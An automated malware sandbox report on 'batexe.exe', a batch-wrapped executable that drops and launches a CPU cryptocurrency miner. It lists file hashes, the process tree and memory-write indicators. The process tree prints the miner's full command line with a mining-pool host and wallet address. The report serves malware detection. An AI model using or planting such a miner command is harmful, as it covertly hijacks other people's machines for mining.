Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
293s -
max time network
299s -
platform
windows10-1703_x64 -
resource
win10-20231215-ja -
resource tags
arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows -
submitted
14/02/2024, 15:20
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20231215-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 4596 b2e.exe 4104 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 4104 cpuminer-sse2.exe 4104 cpuminer-sse2.exe 4104 cpuminer-sse2.exe 4104 cpuminer-sse2.exe 4104 cpuminer-sse2.exe -
resource yara_rule behavioral1/memory/4224-4-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4224 wrote to memory of 4596 4224 batexe.exe 75 PID 4224 wrote to memory of 4596 4224 batexe.exe 75 PID 4224 wrote to memory of 4596 4224 batexe.exe 75 PID 4596 wrote to memory of 2212 4596 b2e.exe 76 PID 4596 wrote to memory of 2212 4596 b2e.exe 76 PID 4596 wrote to memory of 2212 4596 b2e.exe 76 PID 2212 wrote to memory of 4104 2212 cmd.exe 79 PID 2212 wrote to memory of 4104 2212 cmd.exe 79
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4224 -
C:\Users\Admin\AppData\Local\Temp\9819.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\9819.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9819.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4596 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\99FE.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4104
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.2MB
MD513015dfa459e1048325f8581f5d46054
SHA16f6984c9d862d72be22acfca329d88e5544ff4ba
SHA2565ba4ce2c5f0c79c07e41fbeb186521335ae060de242c49ce54feb64ff973a696
SHA51246ef05875d1a71097f80d15a5f4db2e9d1447b5505265eca3c17972fd6974afd15387b045856a26f799fd7d2009ae250a11083fcda1ff864fd2fdc1be5002695
-
Filesize
4.7MB
MD54b591b460134a9b338f7d3953c13eafa
SHA1e60ee796d81f9708aa96363e180d8d7b86ecd752
SHA2560f973cee720ef7c4918c3e9ae9b6926c355201d6344f311bf3792371cc14fb86
SHA5124f738422372d8ad28cdcaa11bf178caced8f5fd41c9616f6670d541046fd3f27741cfa2b58718b64a63915d32bbe885c692effcc9b80d118761fd0bb5af5f9ff
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
986KB
MD52601e9812b1edac6dae87ddcda44b069
SHA1b697a3865038a00ea65a7f7b6ba4528989203bfb
SHA256187a31a3a60ccf24f3f4cb56f342c84ba9c913a9fcd318621645e3481db65051
SHA5121cb3f3a000ee023077bb56c3f1f48dfb178c32d470a5b811e5a97f8acc2f6fe14ef94a208cc50e6cb2a7a150dfe17dde14d9612140ca02a27b20380ab901be26
-
Filesize
1.1MB
MD5a8abcdcc2a9aa0b9b08d2665046c2b4c
SHA15ce706b86504e476af2c3b6df2a2fa97855bb13c
SHA256bf1c9cd67c83a5a8fcbf0a7b43d103d7e1d5bbeff12cfe94d1c9c06f2dc8c960
SHA512ca8b09c5b53ea1e8737e6757f6d4fcaef27e57d51d8199ad6b8604fc1fc340da3f800a3bf84c4137b7f1e316869da453d701ac50f59649879aa8905d46cd9059
-
Filesize
775KB
MD5530389ac63e37a0c5f888016dccf3fd9
SHA1380c9fbe353159f3980ab9b8b3ba3430bb9ab738
SHA2561aa460272308b7bc86c226f86e92ea2a249796b427d88408748be964ede4bcac
SHA5128054bf891c37a4bdb4bb49818379fe2e3f075076f379bd7aad86900fb339da7c5b9b471a69cebac5db74032989e6c96b78def76ed02d3ede39ce987b64e2fa38
-
Filesize
832KB
MD5d33f0e6bb5e8d2b9e111a90544790dc8
SHA1df4e81d22638d511e761744e886c33bc12096c48
SHA25640729edf62213c039a1818c9adb9478aa0284bb26dd071bd1ac4de1da2470048
SHA512ce4ebeae054117d4de8b3fe2403d95a6d819483269f851618958e864887e9b2f42fc9c893e1aa207dfa2d94900c8f4214a67796ddeb2a80ce655d69ec290d629
-
Filesize
347KB
MD5adf1ed18b8d3eb21ec05eaee8cfe268c
SHA12312044c1209450cfad955422557a3e32c2e43f2
SHA25638ed9cf530a7d42b52bdbd6f87322ade2bf872a22234589632f451e40a8a770a
SHA5122938920767be79a592dff7cff7811326c8445a62e65dabbd01d4505983f56c8887b512737eec36ac39f8d290a3880fbc0205a2be8fab7467eb95efc356289c83
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1007KB
MD53825ccdaa577dd928de64ee4124fa639
SHA14d485075e4d15357209224054f044679457a43c2
SHA256050ca2e39a0bb89081644efee59d3d8a838c0a84c89373163c403b97c3271998
SHA51288014fdbce28b377cbda5766271b0efdd10769bc6bb74382474a3f318a5a0107db379ea4c10579367d60ed106ccb9644b24d370834eec873fab6351631773c74
-
Filesize
761KB
MD577dd1a808ebf6a0e025f941a9247e38e
SHA178b63754eef3200f0684caf03a7626ee0870c184
SHA25649d4fdd7a8d8a0c901820b1ad40ddbc48c659c0877226998fd84689a28cabcdd
SHA51280b427330b06da78be83f3c565c1cf2e594aca9fcca4ea86d673d6655453642dfde2640bef08b121000d2ff1ef30661490566b9e7e64c55290620b3d4034fdb9
-
Filesize
699KB
MD5b6d514584fc25b01f2d1f6f972de9bc6
SHA1efc771006bea1859130d32cb1ca405df3a9bc6ea
SHA256c746bcba66ba4d8fe62d6efc15f5f2e86753d28994bbaa1019d3bcf2076c18b7
SHA512d2837ae49f9a699495ee64fdc6ac28f22207535c21c54df8e3802d05018a12f07fa89000e2cfe42fa6c58fc10ee0f6f12ef0251dddd9e1165a00841cca82cf96
-
Filesize
606KB
MD550bc2bd613b3aab19fad9965926bfe24
SHA1d7ee52609edabdcdbdbfd359e8b8c0d226d43473
SHA256a311f6198dcf2bb585c736573d83f2c5656f164305c4ec8eadf33edb769ad1e2
SHA512afdab58ab8cfddd523c138b93a07be6e26ee56589d60d9e81deb9a5ad9da0c6d97fa8338a94bad201d7ab192a680cff54c5e379ff25914fdda2033cb1ecf37d8